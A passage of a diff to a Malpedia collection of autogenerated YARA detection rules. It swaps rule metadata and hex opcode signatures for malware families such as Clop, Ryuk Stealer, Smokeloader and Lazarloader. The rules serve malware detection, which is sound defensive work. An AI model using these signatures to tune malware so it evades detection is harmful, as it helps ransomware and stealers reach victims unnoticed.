f20f59ca f20f58c1 f20f2cc8 894dd4 8b550c 83ba381c000000 } - $sequence_2 = { e8???????? 8b8510feffff e9???????? 6800010000 8b9588feffff 52 e8???????? } - $sequence_3 = { c1e000 8b4dfc 0fbe1401 85d2 7409 8b45f8 83c001 } - $sequence_4 = { e8???????? 83c40c 8983b0010000 85c0 750a 6815060000 e9???????? } - $sequence_5 = { e8???????? 83c414 85c0 0f84e1010000 ff7518 8d4704 57 } - $sequence_6 = { eb07 c745fc00000000 8b5508 8b4204 3b45fc 7404 33c0 } - $sequence_7 = { 8b783c 037904 8b8610010000 8bef c1f808 896c2414 8807 } - $sequence_8 = { 8b4620 83c408 314500 8b4624 314504 8b4628 314648 } - $sequence_9 = { eb06 8b55f4 8955f0 b801000000 6bc800 8b55f0 0fbe040a } + $sequence_0 = { f7f9 85d2 743b 8b45f4 8d4f17 83c00b 99 } + $sequence_1 = { 74d9 eb57 99 f7ff 85d2 7450 8b4c2410 } + $sequence_2 = { c68574faffff00 c68575faffff4b c68576faffff40 c68577faffff0a c68578faffff40 c68579faffff6e c6857afaffff40 } + $sequence_3 = { c6855bfcffff05 c6855cfcffff20 c6855dfcffff08 c6855efcffff20 c6855ffcffff27 c68560fcffff20 } + $sequence_4 = { 7905 48 83c8fc 40 744a 8b4df4 8d4303 } + $sequence_5 = { 99 f7ff 85d2 752c 0f1f4000 8b859cf7ffff 99 } + $sequence_6 = { 0f84f7040000 8d4f03 c745f005000000 660f1f840000000000 c745f405f26700 8b45f4 99 } + $sequence_7 = { c645aa00 c645ab6b c645ac00 c645ad48 c645ae00 c645af00 c645b000 } + $sequence_8 = { c644246205 c644246347 c644246405 c64424655a c644246605 c644246727 c644246805 } + $sequence_9 = { 660f28b870024300 660f54f0 660f5cc6 660f59f4 660f5cf2 f20f58fe 660f59c4 } condition: - 7 of them and filesize <3743744 + 7 of them and filesize <501760 } -rule MALPEDIA_Win_Chthonic_Auto : FILE +rule MALPEDIA_Win_Hermes_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "a742c49c-6e3e-5872-bf95-e2e0adb04114" + id = "61ab2fc1-04d0-5933-ac64-b12602279b7d" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.chthonic" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.chthonic_auto.yar#L1-L120" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hermes" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.hermes_auto.yar#L1-L111" license_url = "N/A" - logic_hash = "836fdc80a654c12e0017df0790b315dbe177f1e5fd0fa5cd260efc9eb4af2475" + logic_hash = "9cfed48151b17cbf55d1481eb34069ea472830263b97aa44ce683b55da6f12b5" score = 75 quality = 75 tags = "FILE" @@ -159716,32 +162420,32 @@ rule MALPEDIA_Win_Chthonic_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7459 4f 8bf0 8bcf d3ee 83e601 } - $sequence_1 = { 0f845d010000 4f 8bf0 8bcf } - $sequence_2 = { 81cf00ffffff 47 8a01 8845ff 8d84bdfcfbffff 8b10 } - $sequence_3 = { 80e17f 8808 b001 5b c3 55 } - $sequence_4 = { 8b75f8 83fe02 0f850d010000 8b4df0 } - $sequence_5 = { 016e04 83c703 013e 8b36 83c410 } - $sequence_6 = { 5e 0f94c0 5b c9 c3 8b041a } - $sequence_7 = { 53 ff7510 ff7508 e8???????? 85c0 } - $sequence_8 = { 80e17f 8808 b001 5b c3 55 8bec } - $sequence_9 = { ff751c ff7518 ff7514 53 ff7510 ff7508 e8???????? } + $sequence_0 = { 6a01 6810660000 ff75fc ff15???????? } + $sequence_1 = { ff15???????? 33d2 6a79 59 f7f1 83c261 } + $sequence_2 = { 6a01 ff15???????? 8d45fc 50 } + $sequence_3 = { 8b4508 83c801 50 6a01 ff75fc } + $sequence_4 = { 8b4508 83c801 50 6a01 ff75fc ff15???????? } + $sequence_5 = { 50 8b4508 83c801 50 } + $sequence_6 = { 6a04 6800100000 6888130000 6a00 } + $sequence_7 = { 50 6a01 6810660000 ff75fc ff15???????? } + $sequence_8 = { 6800100000 6888130000 6a00 ff15???????? } + $sequence_9 = { 50 8d45fc 50 ff15???????? 6a20 } condition: - 7 of them and filesize <425984 + 7 of them and filesize <7192576 } -rule MALPEDIA_Win_Iispy_Auto : FILE +rule MALPEDIA_Win_Thunker_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "204a2c38-8895-5ac0-a1fb-2cdf3f008fea" + id = "ef50f850-b9ad-5639-a44d-12383e7ab286" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.iispy_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.thunker_auto.yar#L1-L123" license_url = "N/A" - logic_hash = "7326802c4105c66879b54e4bc2a70df2a9f75047a51ff2245fe60a57fbe51d36" + logic_hash = "9bc1b7f9eb35f46db81209055d59765c3ce32324a39fc618186d9d412df8d09c" score = 75 quality = 75 tags = "FILE" @@ -159755,32 +162459,32 @@ rule MALPEDIA_Win_Iispy_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { ebdc 837b1800 0f85f6000000 3bce 7436 8a01 3c5d } - $sequence_1 = { d1e8 03d0 8b5e0c 8b7d08 2bd9 03fb } - $sequence_2 = { 85c0 755e f7459c00100000 7503 8b7608 } - $sequence_3 = { ff2485887a0010 51 8bcf e8???????? 8b17 8b4210 2b420c } - $sequence_4 = { 6a00 ff75e4 c745e800000000 ffd6 85c0 0f856effffff eb0c } - $sequence_5 = { 85f6 0f84c1010000 0fb7460e 8bc8 c1e90a f6c101 } - $sequence_6 = { 0f1145c8 8b4810 894dc4 b903000000 0f1100 6689480e 8d4dc8 } - $sequence_7 = { 8955b4 8d0409 50 6a00 52 e8???????? b800100000 } - $sequence_8 = { f6430801 7411 8d5304 8bcf e8???????? 5f 5e } - $sequence_9 = { 8b742424 8b7c2420 884c240b 89742410 897c241c e9???????? 3bf8 } + $sequence_0 = { 89c7 50 68???????? 8dbd00feffff 57 e8???????? 83c420 } + $sequence_1 = { e8???????? 89c6 83feff 7420 } + $sequence_2 = { 8d8500feffff 50 56 e8???????? 89c7 83ffff } + $sequence_3 = { e8???????? 83c40c 89c7 e8???????? 8985ecfdffff } + $sequence_4 = { d1ea 8995e8fdffff 56 e8???????? 6a08 68???????? 68???????? } + $sequence_5 = { 68204e0000 68d3710000 50 e8???????? 6a00 68804f1200 68dd710000 } + $sequence_6 = { 83c40c 8d8544edffff 50 e8???????? 8985c4edffff 8b400c } + $sequence_7 = { 7433 7c79 3df1710000 7447 } + $sequence_8 = { 8d85f0edffff 50 57 e8???????? 83bdf0eeffff05 752e } + $sequence_9 = { e8???????? 68???????? e8???????? 83c41c 68???????? 68???????? e8???????? } condition: - 7 of them and filesize <397312 + 7 of them and filesize <73728 } -rule MALPEDIA_Win_Ransomlock_Auto : FILE +rule MALPEDIA_Win_Lookback_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "14d92420-c852-5e3f-a3ed-35c5bfb9c9b6" + id = "5641bb4f-38a9-52e1-a4b7-204dc4620521" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ransomlock" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ransomlock_auto.yar#L1-L130" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lookback" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lookback_auto.yar#L1-L121" license_url = "N/A" - logic_hash = "febe0932e68debf15b0eb0e37d5a00d2ff8a7e3a0c0b884f506cda6ff33b2a0c" + logic_hash = "68449af30b767d5c82dfe8271f4bbe8c83972fe98d28065e60e3bffd1a6dc166" score = 75 quality = 75 tags = "FILE" @@ -159794,32 +162498,32 @@ rule MALPEDIA_Win_Ransomlock_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 50 e8???????? 83c408 8b0d???????? 6a64 51 ff15???????? } - $sequence_1 = { 99 2bc2 6a00 8bd1 d1ea d1f8 } - $sequence_2 = { 8b5120 56 50 ffd2 85c0 7807 c745ec01000000 } - $sequence_3 = { 0f8418010000 8b08 8d55fc 52 50 8b4120 } - $sequence_4 = { 0fb7047521664000 4e 6685c0 75ec 57 68???????? ffd3 } - $sequence_5 = { 50 ff15???????? 83c410 6a01 53 } - $sequence_6 = { 57 ff15???????? 8d70ff 0fb70477 6685c0 7413 8bff } - $sequence_7 = { 90 68???????? 33f6 ff15???????? a1???????? 85c0 7429 } - $sequence_8 = { 8b45f0 3bc6 0f8418010000 8b08 8d55fc 52 50 } - $sequence_9 = { 52 8d8574fdffff 68???????? 50 ff15???????? 83c410 6a01 } + $sequence_0 = { 53 8944241a 57 66894c2416 89442422 8bfa } + $sequence_1 = { 8b7c241c 33ed 8b473c 8b443878 03c7 8b5024 } + $sequence_2 = { 55 8bec 51 53 c745fc00000000 b801000000 } + $sequence_3 = { c3 5e 5d 33c0 5b 81c410070000 c3 } + $sequence_4 = { 3c01 893d???????? 893d???????? 752e } + $sequence_5 = { c644240800 88442415 e8???????? 8d4c240c 89442408 51 } + $sequence_6 = { 8d5108 d1e8 85c0 7e33 } + $sequence_7 = { 74a7 8b06 85c0 757b } + $sequence_8 = { 52 8d442418 57 50 68???????? 57 57 } + $sequence_9 = { 55 8bec 51 53 c745fc00000000 b801000000 0fa2 } condition: - 7 of them and filesize <360448 + 7 of them and filesize <131072 } -rule MALPEDIA_Win_Khrat_Auto : FILE +rule MALPEDIA_Win_Molerat_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "cae82139-c683-5bf8-8807-a11668477f96" + id = "6649c702-0322-5056-bfb1-5bb59b0b659a" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.khrat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.khrat_auto.yar#L1-L118" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.molerat_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.molerat_loader_auto.yar#L1-L132" license_url = "N/A" - logic_hash = "074673c423b5c49f07577630b1f328510bc324887f41ca6e4261bb8bfff0e2f0" + logic_hash = "9e4d3c42bd1eb8db57dd9c545f5a5ad86009e39e60f601bd2428ef16d555d86e" score = 75 quality = 75 tags = "FILE" @@ -159833,32 +162537,32 @@ rule MALPEDIA_Win_Khrat_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8d858cfbffff 50 68f4030000 57 } - $sequence_1 = { 66c745e00000 8b859cfbffff 8945e8 8b8590fbffff 8945ec 8945f0 } - $sequence_2 = { c9 c20400 55 8bec 81c4d0f9ffff } - $sequence_3 = { 81c448feffff c705????????ffffffff 8d8572feffff 50 6802020000 e8???????? 6a06 } - $sequence_4 = { 68???????? 6a00 e8???????? 0bc0 0f840e010000 } - $sequence_5 = { 66c746326500 66c746347700 66c746363a00 66c746380000 8db500feffff } - $sequence_6 = { ff35???????? 8f45e6 8d45e2 50 e8???????? c9 } - $sequence_7 = { eb25 ff35???????? e8???????? 8d85d4fdffff } - $sequence_8 = { c9 c3 55 8bec 83c4fc 833d????????ff } - $sequence_9 = { 50 8d85bcf8ffff 50 8d85dcf8ffff 50 8d8500ffffff } + $sequence_0 = { 83c40c 68???????? 50 8d8dc0fdffff 51 c645fc18 } + $sequence_1 = { 68???????? e8???????? 8b4d58 e8???????? e9???????? 68???????? e8???????? } + $sequence_2 = { 7d0d 8a4c181c 888860464400 40 ebe9 33c0 8945e4 } + $sequence_3 = { 83c40c 8d957cffffff 52 50 8d85d0fdffff 50 c645fc3a } + $sequence_4 = { 50 8b4204 ffd0 8d4d0c e8???????? 8d8da0fdffff c645fc07 } + $sequence_5 = { 7f0a 8b08 8b11 50 8b4204 ffd0 c645fc69 } + $sequence_6 = { 8b95ecfeffff 8995e8feffff c745fc01000000 b8???????? c3 c645fc00 } + $sequence_7 = { 8d4c247c c68424d800000002 e8???????? 8d54247c 52 c7842480000000e8c64300 e8???????? } + $sequence_8 = { 83c010 83c404 8945e8 68???????? 68???????? 8d4de4 51 } + $sequence_9 = { 8d8d74ffffff c645fc03 e8???????? 8d8574ffffff 50 8d4d5c 68???????? } condition: - 7 of them and filesize <57344 + 7 of them and filesize <688128 } -rule MALPEDIA_Win_Ironwind_Auto : FILE +rule MALPEDIA_Win_Breakthrough_Loader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59e0122b-e237-5b83-a993-a2711164e0ad" + id = "c04a79be-d1c6-5097-81f4-9cd0a78c5ca6" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ironwind" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ironwind_auto.yar#L1-L133" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.breakthrough_loader_auto.yar#L1-L122" license_url = "N/A" - logic_hash = "db36742cc3e5372580f85bcac0b5325edc83e1defe6a3dbe06584de3a3fb0586" + logic_hash = "6b4d6b03c6e2480f390e69c1bdad99aa25aa8d566c5f76108e42a507f3962675" score = 75 quality = 75 tags = "FILE" @@ -159872,34 +162576,34 @@ rule MALPEDIA_Win_Ironwind_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { be01000000 8bc6 e9???????? 4803c9 488b6cca08 4885ed 74e7 } - $sequence_1 = { c3 4533c0 418d5002 8d4a15 ff15???????? 4883f8ff } - $sequence_2 = { e9???????? 488d0d823e0300 4889bc24a0000000 e8???????? 488bf8 4885c0 7508 } - $sequence_3 = { ff15???????? 488b742460 4885db 7409 488bcb ff15???????? 8bc7 } - $sequence_4 = { 80b85011000001 488d152cc40400 488d0d4dc40400 480f45d1 488bc8 e8???????? 488bf8 } - $sequence_5 = { 8d5001 8d4838 ff15???????? 488bf8 4885c0 7508 8d471b } - $sequence_6 = { f20f1101 e9???????? 0f57c0 f2480f2a87100b0000 f20f1101 e9???????? 0f57c0 } - $sequence_7 = { bf05000000 8bc7 eb53 bf02000000 8bc7 eb4a 664183f804 } - $sequence_8 = { 85c0 742e 0fbe03 4c8d156f8ffdff 83c0e0 83f85a 0f8765020000 } - $sequence_9 = { e8???????? 488b8f50070000 4885c9 7469 ff15???????? 488983d0060000 4885c0 } + $sequence_0 = { 7e2a 8b7df8 660f1f840000000000 0fb7444e08 a900300000 740a } + $sequence_1 = { 5d c3 8b4d14 890e 8b4d24 } + $sequence_2 = { 8945e8 8945f8 8b4508 56 be???????? c745eca07d4400 57 } + $sequence_3 = { 8b450c 0fb68401d86a4400 c1e804 5d } + $sequence_4 = { 85f6 742d 83f910 8d442420 0f43442420 881418 } + $sequence_5 = { e8???????? 33c0 c744242c07000000 8d8c2490000000 } + $sequence_6 = { 8bc7 83e03f 6bc830 8b049540354500 f644082801 7421 57 } + $sequence_7 = { 83e03f 6bc030 59 59 0304bd40354500 5f eb05 } + $sequence_8 = { 8b0cbd40354500 83c410 8b7de8 89440f20 8bc6 } + $sequence_9 = { 8b3e 8d0417 3bd0 731d 8d47ff 8906 8b4b20 } condition: - 7 of them and filesize <995328 + 7 of them and filesize <753664 } -rule MALPEDIA_Win_Clop_Auto : FILE +rule MALPEDIA_Win_Sepulcher_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "59cb28c0-0028-51c2-94ee-931d5b6fa068" + id = "666ccc80-c712-59f8-bf12-61bac5486b32" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.clop" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.clop_auto.yar#L1-L188" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.sepulcher" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.sepulcher_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "f2736024915a6a0ca98a26d3016fbd37034bb9a8e1a0f37004991cc314f844e2" + logic_hash = "fea20fdb29a4a6cc26bf9baf225a8110e30f06d577e665b386797a74632bb5da" score = 75 - quality = 75 + quality = 73 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -159911,41 +162615,32 @@ rule MALPEDIA_Win_Clop_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 83c40c 6860070000 6a40 ff15???????? } - $sequence_1 = { 6a04 6800300000 6887000000 6a00 } - $sequence_2 = { ff15???????? 56 53 8bf8 ff15???????? 8bf0 56 } - $sequence_3 = { 57 6a00 ff15???????? 68???????? 8bd8 } - $sequence_4 = { ff15???????? 8bf0 56 53 ff15???????? 50 } - $sequence_5 = { 6683e07f 6683f87f 8d642408 0f85fd0b0000 eb00 f30f7e442404 660f2815???????? } - $sequence_6 = { 50 ff15???????? 83c40c 6860070000 } - $sequence_7 = { ffd0 c3 8bff 55 8bec 83ec1c 8d4de4 } - $sequence_8 = { 0f85aa010000 68???????? 8d442450 50 } - $sequence_9 = { 8be5 5d c20400 56 ff15???????? 6a00 } - $sequence_10 = { 8d85bcefffff 50 ff15???????? 68???????? } - $sequence_11 = { 68???????? 68???????? e8???????? 83c424 6aff } - $sequence_12 = { 6888130000 ffd7 6a00 6a00 6a00 68???????? } - $sequence_13 = { ff15???????? 68???????? 8d85dcf7ffff 50 } - $sequence_14 = { 83c408 6aff ff15???????? 33c0 } - $sequence_15 = { 83c40c 33f6 85ff 7428 } - $sequence_16 = { 83c424 53 50 ffd6 } - $sequence_17 = { 6aff ffd7 8b4dfc 33c0 5f } - $sequence_18 = { 8d8424dc0b0000 50 ffd6 85c0 751a 68???????? 8d8424dc0b0000 } + $sequence_0 = { 56 57 6a43 8bf9 58 6a4d 8db784480000 } + $sequence_1 = { 7515 6a04 8d45bc 50 e8???????? 8b4db8 8bd0 } + $sequence_2 = { 58 6a74 59 6a53 668945ea 58 } + $sequence_3 = { 0fb71408 8bc2 c1e002 66393408 75f1 } + $sequence_4 = { eb1a 8d45fc 50 8b04bd50de0110 ff743018 } + $sequence_5 = { 668945d2 b8???????? 66894db4 66894dba 66894dc0 } + $sequence_6 = { 56 57 6a5a 58 6a52 } + $sequence_7 = { c1f906 6bd030 8b45fc 03148d50de0110 8b00 894218 } + $sequence_8 = { 8bd8 895db0 8d0c4dffff0000 51 57 53 e8???????? } + $sequence_9 = { 58 6a33 668945e8 668945ea 58 6a32 668945ec } condition: - 7 of them and filesize <796672 + 7 of them and filesize <279552 } -rule MALPEDIA_Win_Darkdew_Auto : FILE +rule MALPEDIA_Win_Lazarloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "0ed49e32-b5ea-5f63-b18e-3ccfdc3576f0" + id = "eeec4f28-0f22-51be-ae2e-de44f3255986" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkdew" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.darkdew_auto.yar#L1-L122" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.lazarloader_auto.yar#L1-L124" license_url = "N/A" - logic_hash = "0cd505ddc1a03cf19308335c9ef43a0054cd013c3658d925b20aa0cf71f6aa36" + logic_hash = "2c7bcf20b8b4c12e652b091953d52f7cafa589f18b8b9e18e7eefdba4a60b648" score = 75 quality = 75 tags = "FILE" @@ -159959,34 +162654,34 @@ rule MALPEDIA_Win_Darkdew_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 8b55d0 c745b400000000 c745b80f000000 c645a400 83fa08 722e 8b4dbc } - $sequence_1 = { 03c0 660f283485c0840110 baef7f0000 2bd1 } - $sequence_2 = { 7202 8b12 8bca c745ac00000000 33c0 c745b007000000 } - $sequence_3 = { 8d4d9c 8d45d4 c78586feffff00000000 0f434d9c ba14060000 } - $sequence_4 = { c645fc11 8b55cc 83fa08 7232 8b4db8 8d145502000000 8bc1 } - $sequence_5 = { 6a00 ff15???????? cc 55 8bec 64a100000000 6aff } - $sequence_6 = { b991000000 8dbc2470020000 8bf3 f3a5 8bf0 8dbc24b4040000 8d842480030000 } - $sequence_7 = { e8???????? 8bf8 c645fc19 8d55d4 837de810 } - $sequence_8 = { 85c0 0f8488000000 8b4df8 8d5823 8b55fc } - $sequence_9 = { 8db3d0feffff 8bce 83e210 8d7901 0f1f4000 } + $sequence_0 = { 483b0d???????? 7417 488d059c4f0100 483bc8 } + $sequence_1 = { 7528 48833d????????00 741e 488d0d30a80100 e8???????? 85c0 740e } + $sequence_2 = { 8bc2 488d154241ffff c1e803 89442438 448be0 89442440 85c0 } + $sequence_3 = { 488d0563810000 488bd9 483bc8 7417 8b815c010000 } + $sequence_4 = { 4889542410 48894c2408 57 4881ece0080000 33c0 66898424a0000000 488d8424a2000000 } + $sequence_5 = { 4c8bea 4b8b8cf770c10100 4c8b15???????? 4883cfff 418bc2 498bd2 4833d1 } + $sequence_6 = { 8bcf e8???????? 488bd7 4c8d05fecd0000 83e23f 488bcf 48c1f906 } + $sequence_7 = { 48897018 48897820 4156 33ed 4c8d35e6900000 448bd5 488bf1 } + $sequence_8 = { e8???????? 488bd7 4c8d05fecd0000 83e23f } + $sequence_9 = { 488bda 4c8d0d6bad0000 8bf9 488d15a2930000 b906000000 } condition: - 7 of them and filesize <279552 + 7 of them and filesize <364544 } -rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE +rule MALPEDIA_Win_Smokeloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "129184de-8948-5274-9e65-221045ceab9c" + id = "977bd971-8931-5636-8c4a-15a97d7d7052" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ryuk_stealer" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.ryuk_stealer_auto.yar#L1-L113" + reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader" + source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.smokeloader_auto.yar#L1-L568" license_url = "N/A" - logic_hash = "32617ac72ab27e6e0bdc0cedf044a04c83b7c2ead314f2e254d4a430611a1927" + logic_hash = "1e0a8327807cdebec07ee883bf0e214c6531b2f2bf2969115a759b540a5a3955" score = 75 - quality = 75 + quality = 50 tags = "FILE" version = "1" tool = "yara-signator v0.6.0" @@ -159998,32 +162693,87 @@ rule MALPEDIA_Win_Ryuk_Stealer_Auto : FILE malpedia_sharing = "TLP:WHITE" strings: - $sequence_0 = { 7410 83ff01 755d 8bcb } - $sequence_1 = { ff15???????? 33ff 0fb60437 50 } - $sequence_2 = { 75f5 2bd1 8d8db4fdffff d1fa 8d7102 } - $sequence_3 = { 50 e8???????? 83c40c ff15???????? 33d2 b910270000 } - $sequence_4 = { 83ff01 755d 8bcb e8???????? } - $sequence_5 = { 50 ff15???????? 8bf0 ff15???????? 85c0 7518 } - $sequence_6 = { 83ff01 755d 8bcb e8???????? 3bc7 } - $sequence_7 = { 99 b9a0860100 f7f9 81c2f8240100 52 ff15???????? } - $sequence_8 = { 7560 8d85b4fdffff 68???????? 50 } - $sequence_9 = { ff15???????? 8d442454 50 ff15???????? 50 } + $sequence_0 = { ff15???????? 8d45f0 50 8d45e8 50 8d45e0 50 } + $sequence_1 = { 57 ff15???????? 6a00 6800000002 6a03 6a00 6a03 } + $sequence_2 = { 50 8d45e0 50 56 ff15???????? 56 ff15???????? } + $sequence_3 = { 8bf0 8d45dc 50 6a00 53 ff15???????? } + $sequence_4 = { 740a 83c104 83f920 72f0 } + $sequence_5 = { e8???????? 8bf0 8d45fc 50 ff75fc 56 6a19 } + $sequence_6 = { ff15???????? bf90010000 8bcf e8???????? } + $sequence_7 = { 0fb64405dc 50 8d45ec 50 } + $sequence_8 = { 50 56 681f000f00 57 } + $sequence_9 = { 56 8d45fc 50 57 57 6a19 } + $sequence_10 = { 668ce8 6685c0 7406 fe05???????? } + $sequence_11 = { 8b07 03c3 50 ff15???????? } + $sequence_12 = { 56 ff15???????? 50 56 6a00 ff15???????? } + $sequence_13 = { 33c0 e9???????? e8???????? b904010000 } + $sequence_14 = { 88443c18 88543418 0fb64c3c18 0fb6c2 03c8 81e1ff000000 } + $sequence_15 = { 81e5ff000000 8a442c18 88443c18 47 } + $sequence_16 = { e8???????? 8bf8 68???????? ff15???????? } + $sequence_17 = { ebf5 55 8bec 83ec24 8d45f4 53 } + $sequence_18 = { 50 57 ff15???????? 43 83fb0f } + $sequence_19 = { 8b7d10 50 57 56 53 e8???????? } + $sequence_20 = { 8d8de8fdffff 50 50 50 } + $sequence_21 = { 8d95f0fdffff c70200000000 6800800000 52 51 6aff } + $sequence_22 = { 8985ecfdffff ffb5f0fdffff 50 53 e8???????? 8d8decfdffff } + $sequence_23 = { e8???????? 2500300038 005800 2500300038 } + $sequence_24 = { 8db5f8fdffff c60653 56 6a00 6a00 6a00 } + $sequence_25 = { 8b4514 898608020000 56 6aff } + $sequence_26 = { 01d4 8d85f0fdffff 8b750c 8b7d10 50 57 } + $sequence_27 = { fc 5f 5e 5b } + $sequence_28 = { 89e5 81ec5c060000 53 56 } + $sequence_29 = { 30d0 aa e2f3 7505 } + $sequence_30 = { 89cf fc b280 31db a4 } + $sequence_31 = { 60 89c6 89cf fc } + $sequence_32 = { ff15???????? 85c0 747c 488b4c2448 4533c9 488d442440 } + $sequence_33 = { 488b4547 488907 4885c9 740f 8b450f 48894d17 83c802 } + $sequence_34 = { 33c9 e8???????? 488bd8 4584ff 7411 41b101 } + $sequence_35 = { 4f 8d1c10 41 8b4b18 45 } + $sequence_36 = { 01c4 ffc9 49 8d3c8c } + $sequence_37 = { 4c 01c7 8b048f 4c } + $sequence_38 = { 49 8d3c8c 8b37 4c 01c6 } + $sequence_39 = { 41b104 448bc7 488bcb e8???????? 488b742440 488bc3 488b5c2430 } + $sequence_40 = { 55 89e5 81ec54040000 53 } + $sequence_41 = { 33c9 4c897c2428 c744242000a00f00 ff15???????? } + $sequence_42 = { 8b4b18 45 8b6320 4d } + $sequence_43 = { 89d0 c1e205 01c2 31c0 ac 01c2 85c0 } + $sequence_44 = { 83c408 85c0 0f84cb000000 8b45f4 2d10bf3400 0fb74dec } + $sequence_45 = { 8946fc ad 85c0 75f3 c3 56 } + $sequence_46 = { 56 ad 01e8 31c9 c1c108 3208 } + $sequence_47 = { 8b4da0 8b55a4 895148 689d1e6b63 8b45e4 50 } + $sequence_48 = { 8b45b4 894220 eb10 8b8d78ffffff 8b11 899578ffffff ebae } + $sequence_49 = { 03471c 8b0428 01e8 5e c3 } + $sequence_50 = { 5b c9 c20800 55 89e5 83ec04 } + $sequence_51 = { e8???????? 8945ac 6a00 6a04 8d45b4 50 } + $sequence_52 = { aa e2f3 7506 7404 } + $sequence_53 = { 55 8bec 83c4d0 1e 53 } + $sequence_54 = { 684a0dce09 8b45e4 50 e8???????? 8945a8 8b4da0 8b55a8 } + $sequence_55 = { 83ec0c e8???????? 8945f8 8b45f8 8b4860 894df4 ff7518 } + $sequence_56 = { 803800 75f5 31d1 75ec } + $sequence_57 = { 8b450c 2d10bf3400 8b4d08 c1e103 } + $sequence_58 = { 8b55f8 0fb70a c1e103 33d2 f7f1 8945fc } + $sequence_59 = { 5e c3 60 89c6 } + $sequence_60 = { 9a18a15c5d5d5d d6 0055d0 08a50f375d37 } + $sequence_61 = { 48 35f94e5d5d d6 59 79de 99 } + $sequence_62 = { 5d 5d b658 1f 79b6 a888 } + $sequence_63 = { 0055d0 08a50f375d37 5d 37 } + $sequence_64 = { 5d 5d 285829 5e cb } condition: - 7 of them and filesize <368640 + 7 of them and filesize <245760 } -rule MALPEDIA_Win_Darkpink_Auto : FILE +rule MALPEDIA_Win_Photoloader_Auto : FILE { meta: description = "autogenerated rule brought to you by yara-signator" author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5843ba22-3e12-5b07-a302-af204fd4f478" + id = "317a851b-1405-50a0-9b40-ce8155fbfa48" date = "2023-12-06" modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpink" - 